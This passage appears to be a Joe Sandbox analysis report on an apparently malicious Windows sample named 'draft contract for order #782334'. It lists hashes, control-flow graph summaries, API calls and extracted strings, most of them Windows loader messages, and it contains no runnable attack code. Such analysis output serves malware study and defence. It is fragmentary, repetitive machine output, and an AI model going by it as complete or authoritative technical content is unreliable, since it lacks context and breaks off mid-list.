                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                        • Instruction ID: 7abe4184fa686f7f5455c3c33466152b3cc673b8a26a15b33b6be8058f1e03f8
                                                                                                                        • Opcode Fuzzy Hash: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
                                                                                                                        • Instruction Fuzzy Hash: F890026120640003434571594414616800A97E0201B55C031F50145A0DC5758A916626
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                        • Instruction ID: 3b1ddb87a52168808ae43327f2463667d02743fe21dfa92b13464793af2054e6
                                                                                                                        • Opcode Fuzzy Hash: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
                                                                                                                        • Instruction Fuzzy Hash: C090023120540413D35171594504707400997D0241F95C422B4424568DD6A68B52A622
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 0-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 53 413d62-413d7f 54 413d81-413d8c 53->54 55 413d39-413d46 53->55 56 413de0-413e3d call 42e4c3 call 42eed3 call 417513 call 404833 call 424bb3 54->56 57 413d8e-413dbb 54->57 58 413d48-413d5d 55->58 59 413dbc 55->59 72 413e5d-413e63 56->72 73 413e3f-413e4e PostThreadMessageW 56->73 57->59 60 413dd5-413dde 58->60 61 413d5f-413d60 58->61 59->60 60->56 73->72 74 413e50-413e5a 73->74 74->72
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 1836367815-1925500867

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 345 4175b8-4175bf 346 4175c0-4175c6 345->346 347 4175c7-4175ca 346->347 348 4175cb-4175ce 347->348 349 4175fa 347->349 350 4175cf-4175df 348->350 351 4175fc-417617 349->351 352 41758f-41759d call 42dac3 349->352 356 4175eb-4175f6 350->356 351->346 354 417619-417622 351->354 366 417573-417587 LdrLoadDll 352->366 367 41758a-41758d 352->367 357 417624-417632 354->357 358 41764b-41766d 354->358 356->350 361 4175f8-4175f9 356->361 357->356 362 417634-417636 357->362 359 41766e-417671 358->359 361->349 362->359 364 417638 362->364 364->347 365 41763a-417649 364->365 365->358 368 417672-41767e 365->368 366->367 370 417680-417683 368->370 371 417684-41769b call 42f063 368->371 374 41769d-4176ce call 42f063 call 42b2f3 371->374 375 4176cf-4176ef call 42b2f3 371->375
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 382 417506-41750d 383 417547-417558 call 42f8a3 382->383 384 41750f-41753c call 42f003 382->384 388 41755d 383->388 389 417542-417550 call 42f603 384->389 390 41753e-417541 384->390 391 417560-417571 call 42dac3 388->391 389->391 396 417552-417557 389->396 397 417573-417587 LdrLoadDll 391->397 398 41758a-41758d 391->398 396->388 399 417558 call 42f8a3 396->399 397->398 399->388
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 415 41758f-41759d call 42dac3 420 417573-417587 LdrLoadDll 415->420 421 41758a-41758d 415->421 420->421
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 422 417593-41759d call 42dac3 427 417573-417587 LdrLoadDll 422->427 428 41758a-41758d 422->428 427->428
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,00416DF9,000000F4), ref: 0042C712
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 429 42c683-42c6c7 call 4048c3 call 42d5c3 RtlAllocateHeap
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E2E4,?,?,00000000,?,0041E2E4,?,?,?), ref: 0042C6C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,E39CA3BE,?,?,E39CA3BE), ref: 0042C75A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2160512332
                                                                                                                        Strings
                                                                                                                        • Thread identifier, xrefs: 0177553A
                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01775543
                                                                                                                        • Address of the debug info found in the active list., xrefs: 017754AE, 017754FA
                                                                                                                        • undeleted critical section in freed memory, xrefs: 0177542B
                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0177540A, 01775496, 01775519
                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754CE
                                                                                                                        • 8, xrefs: 017752E3
                                                                                                                        • Critical section address., xrefs: 01775502
                                                                                                                        • double initialized or corrupted critical section, xrefs: 01775508
                                                                                                                        • Invalid debug info address of this critical section, xrefs: 017754B6
                                                                                                                        • corrupted critical section, xrefs: 017754C2
                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754E2
                                                                                                                        • Critical section address, xrefs: 01775425, 017754BC, 01775534
                                                                                                                        • Critical section debug info address, xrefs: 0177541F, 0177552E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                        • API String ID: 0-2368682639
                                                                                                                        Strings
                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01772409
                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01772412
                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0177261F
                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017724C0
                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01772602
                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01772624
                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017722E4
                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017725EB
                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01772498
                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01772506
                                                                                                                        • @, xrefs: 0177259B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                        • API String ID: 0-4009184096
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                        • API String ID: 0-2515994595
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                        • API String ID: 0-1700792311
                                                                                                                        Strings
                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01788B8F
                                                                                                                        • VerifierFlags, xrefs: 01788C50
                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01788A3D
                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01788A67
                                                                                                                        • VerifierDlls, xrefs: 01788CBD
                                                                                                                        • HandleTraces, xrefs: 01788C8F
                                                                                                                        • VerifierDebug, xrefs: 01788CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                        • API String ID: 0-3223716464
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                        • API String ID: 0-1109411897
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-792281065
                                                                                                                        Strings
                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01759A2A
                                                                                                                        • apphelp.dll, xrefs: 016F6496
                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01759A01
                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017599ED
                                                                                                                        • LdrpInitShimEngine, xrefs: 017599F4, 01759A07, 01759A30
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01759A11, 01759A3A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-204845295
                                                                                                                        Strings
                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01772160, 0177219A, 017721BA
                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0177219F
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01772178
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01772165
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017721BF
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01772180
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                        • API String ID: 0-861424205
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01778181, 017781F5
                                                                                                                        • LdrpInitializeProcess, xrefs: 0173C6C4
                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01778177, 017781EB
                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 017781E5
                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01778170
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0173C6C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-475462383
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 01742DF0: LdrInitializeThunk.NTDLL ref: 01742DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                        • API String ID: 0-379654539
                                                                                                                        Strings
                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0173855E
                                                                                                                        • LdrpInitializeProcess, xrefs: 01738422
                                                                                                                        • @, xrefs: 01738591
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01738421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1918872054
                                                                                                                        Strings
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 017721DE
                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017721D9, 017722B1
                                                                                                                        • .Local, xrefs: 017328D8
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017722B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                        • API String ID: 0-1239276146
                                                                                                                        Strings
                                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01773456
                                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01773437
                                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0177342A
                                                                                                                        • RtlDeactivateActivationContext, xrefs: 01773425, 01773432, 01773451
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                        • API String ID: 0-1245972979
                                                                                                                        Strings
                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01760FE5
